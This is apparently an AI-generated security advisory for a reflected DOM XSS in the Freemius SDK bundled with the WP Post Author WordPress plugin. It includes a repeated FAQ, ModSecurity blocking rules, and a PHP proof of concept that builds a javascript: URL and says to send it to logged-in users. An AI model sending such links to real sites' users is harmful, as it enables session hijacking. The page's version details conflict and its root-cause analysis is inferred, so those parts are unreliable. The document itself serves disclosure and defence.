What is CVE-2024-13362?

CVE-2024-13362 is a reflected DOM-based cross-site scripting (XSS) vulnerability affecting the WP Post Author plugin versions 3.8.3 and earlier. It allows unauthenticated attackers to inject arbitrary JavaScript via the ‘url’ parameter, which can execute when a user clicks a crafted link.

Who is affected by this vulnerability?

Any WordPress site using the WP Post Author plugin version 3.8.3 or earlier is at risk. Administrators should check their plugin version in the WordPress dashboard and update if necessary.

How does the vulnerability work?

The vulnerability occurs due to insufficient sanitization of the ‘url’ parameter, allowing attackers to inject scripts that execute in the context of the user’s browser session. When a user clicks a malicious link, the injected script can run, potentially compromising their session.

What is the severity of CVE-2024-13362?

The CVSS score for this vulnerability is 6.1, classified as Medium severity. This indicates a moderate risk, as it requires user interaction to exploit, but can lead to significant consequences if successful.

How can I check if my site is vulnerable?

To verify if your site is vulnerable, check the version of the WP Post Author plugin installed. If it is version 3.8.3 or earlier, your site is at risk and should be updated immediately to the patched version.

What steps should I take to mitigate this vulnerability?

To mitigate this vulnerability, update the WP Post Author plugin to version 3.8.4 or later. Additionally, ensure that any custom code using the ‘url’ parameter properly sanitizes inputs using WordPress functions such as esc_url() and esc_js().

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can craft a URL that exploits the reflected XSS vulnerability. By tricking a logged-in user into clicking the link, the attacker can execute JavaScript in the user’s browser, demonstrating the risk of the vulnerability.

What are the potential impacts of exploitation?

If exploited, an attacker can execute arbitrary JavaScript in the victim’s browser, potentially stealing session cookies, performing actions on behalf of the user, or redirecting them to malicious sites. The impact is significant, especially if the victim has administrative access.

How does this vulnerability relate to the Freemius SDK?

The vulnerability is linked to the Freemius SDK, which is bundled with the WP Post Author plugin. The SDK’s insufficient input sanitization of the ‘url’ parameter allows the XSS vulnerability to manifest, affecting many plugins that use this SDK.

What are the best practices for securing WordPress plugins?

Best practices include regularly updating plugins and themes, using security plugins to monitor vulnerabilities, and implementing input validation and output escaping in custom code. Regular security audits can also help identify and mitigate risks.

Is user interaction always required for exploitation?

Yes, exploitation of this vulnerability requires user interaction, specifically clicking on a crafted link. This limits the attack surface but does not eliminate the risk, as attackers can use phishing techniques to trick users.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the WP Post Author plugin until a patch can be applied. Additionally, inform users to avoid clicking on suspicious links until the vulnerability is resolved.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 4, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (wp-post-author)

CVE ID CVE-2024-13362

Plugin wp-post-author

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 3.8.3

Patched Version —

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362 (metadata-based): This vulnerability affects the WP Post Author plugin version 3.8.3 and earlier. It is a reflected DOM-based cross-site scripting (XSS) flaw in the Freemius SDK (bundled with the plugin) that allows unauthenticated attackers to inject arbitrary JavaScript. The CVSS score is 6.1 (Medium), with a vector indicating network attack vector, low complexity, no privileges required, but user interaction (a click) is needed. The CWE-79 classification confirms improper output escaping in page generation.

The root cause is insufficient sanitization of the ‘url’ parameter before it is used to generate HTML or JavaScript in the browser. DOM-based XSS occurs when client-side JavaScript reads attacker-controlled data from the URL (e.g., location.search) and writes it to the DOM without proper encoding. Since no code diff is available, Atomic Edge research infers that the vulnerable code likely reads the ‘url’ GET parameter and passes it to methods like innerHTML or jQuery’s html() without sanitization. This is confirmed by the CWE classification and description which explicitly mentions the ‘url’ parameter. The Freemius SDK is a common library used by many plugins and themes, which explains the broad scope.

Exploitation requires tricking a user into clicking a crafted link. The attack vector is a URL like: http://target.com/?url=javascript:alert(document.domain). The user must be logged into WordPress for the session to be active, but no authentication is needed to trigger the XSS. The payload executes in the context of the vulnerable page, typically an admin page or plugin settings panel that includes the Freemius SDK. The attacker can use encoded or obfuscated JavaScript to evade basic filters, but the core flaw is that the ‘url’ parameter is reflected into the DOM without escaping.

Remediation should involve sanitizing the ‘url’ parameter using WordPress’s esc_url_raw() before storing or embedding it, and output escaping with esc_url() or esc_js() when rendering. The patched version 3.8.4 likely adds proper validation to ensure the URL starts with allowed protocols (http, https) and strips javascript: or data: URIs. Additionally, client-side code should use safe assignment methods like textContent or jQuery’s text() instead of innerHTML.

Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim’s browser within the WordPress admin context. This can be used to steal session cookies, perform administrative actions on behalf of the victim (e.g., create new admin users, modify content), or redirect users to malicious sites. Since the attack requires user interaction and executes in a browser session, the impact is limited by the attacker’s ability to craft a convincing phishing link.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2024-13362 (metadata-based)
# Blocks reflected DOM XSS via the 'url' parameter containing javascript: or data: schemes
SecRule REQUEST_URI "@rx ^/wp-admin/" "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 Reflected XSS via url parameter',severity:'CRITICAL',tag:'CVE-2024-13362',tag:'wordpress',tag:'xss'"
  SecRule ARGS_GET:url "@rx ^(javascript|data|vbscript):" "t:none,t:urlDecodeUni,t:lowercase"

# Also catch direct URL parameter on any page if the vulnerable script is present
SecRule REQUEST_URI "@rx /" "id:20261995,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 Reflected XSS via url parameter (catch-all)',severity:'CRITICAL',tag:'CVE-2024-13362',tag:'wordpress',tag:'xss'"
  SecRule ARGS_GET:url "@rx ^(javascript|data|vbscript):" "t:none,t:urlDecodeUni,t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

// This PoC exploits the reflected XSS via the 'url' parameter on any WordPress page
// that includes the vulnerable Freemius SDK. The attacker must trick a logged-in user
// into clicking the generated URL.

$target_url = 'http://localhost/wordpress'; // Change to the target WordPress base URL
$payload = 'javascript:alert("AtomicEdge_XSS_PoC")';

// Construct the malicious URL
$malicious_url = rtrim($target_url, '/') . '/?url=' . urlencode($payload);

echo "[+] CVE-2024-13362 PoC URL:n";
echo $malicious_url . "nn";
echo "Send this link to a logged-in WordPress user to trigger the XSS.n";
echo "When clicked, the JavaScript payload will execute in their browser session.n";

// Optional: Test if the target responds (does not prove XSS, but validates access)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $malicious_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Response Code: " . $http_code . "n";
if (strpos($response, $payload) !== false) {
    echo "[!] Payload appears in response, indicating potential vulnerability.n";
} else {
    echo "[!] Payload not found in raw response. Check DOM for client-side reflection.n";
}

Frequently Asked Questions

What is CVE-2024-13362?
Overview of the vulnerability
CVE-2024-13362 is a reflected DOM-based cross-site scripting (XSS) vulnerability affecting the WP Post Author plugin versions 3.8.3 and earlier. It allows unauthenticated attackers to inject arbitrary JavaScript via the ‘url’ parameter, which can execute when a user clicks a crafted link.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the WP Post Author plugin version 3.8.3 or earlier is at risk. Administrators should check their plugin version in the WordPress dashboard and update if necessary.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability occurs due to insufficient sanitization of the ‘url’ parameter, allowing attackers to inject scripts that execute in the context of the user’s browser session. When a user clicks a malicious link, the injected script can run, potentially compromising their session.
What is the severity of CVE-2024-13362?
Understanding risk levels
The CVSS score for this vulnerability is 6.1, classified as Medium severity. This indicates a moderate risk, as it requires user interaction to exploit, but can lead to significant consequences if successful.
How can I check if my site is vulnerable?
Steps for verification
To verify if your site is vulnerable, check the version of the WP Post Author plugin installed. If it is version 3.8.3 or earlier, your site is at risk and should be updated immediately to the patched version.
What steps should I take to mitigate this vulnerability?
Recommended actions
To mitigate this vulnerability, update the WP Post Author plugin to version 3.8.4 or later. Additionally, ensure that any custom code using the ‘url’ parameter properly sanitizes inputs using WordPress functions such as esc_url() and esc_js().
What does the proof of concept demonstrate?
Understanding the exploit
The proof of concept illustrates how an attacker can craft a URL that exploits the reflected XSS vulnerability. By tricking a logged-in user into clicking the link, the attacker can execute JavaScript in the user’s browser, demonstrating the risk of the vulnerability.
What are the potential impacts of exploitation?
Consequences of a successful attack
If exploited, an attacker can execute arbitrary JavaScript in the victim’s browser, potentially stealing session cookies, performing actions on behalf of the user, or redirecting them to malicious sites. The impact is significant, especially if the victim has administrative access.
How does this vulnerability relate to the Freemius SDK?
Understanding the connection
The vulnerability is linked to the Freemius SDK, which is bundled with the WP Post Author plugin. The SDK’s insufficient input sanitization of the ‘url’ parameter allows the XSS vulnerability to manifest, affecting many plugins that use this SDK.
What are the best practices for securing WordPress plugins?
Preventative measures
Best practices include regularly updating plugins and themes, using security plugins to monitor vulnerabilities, and implementing input validation and output escaping in custom code. Regular security audits can also help identify and mitigate risks.
Is user interaction always required for exploitation?
Understanding attack vectors
Yes, exploitation of this vulnerability requires user interaction, specifically clicking on a crafted link. This limits the attack surface but does not eliminate the risk, as attackers can use phishing techniques to trick users.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the WP Post Author plugin until a patch can be applied. Additionally, inform users to avoid clicking on suspicious links until the vulnerability is resolved.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations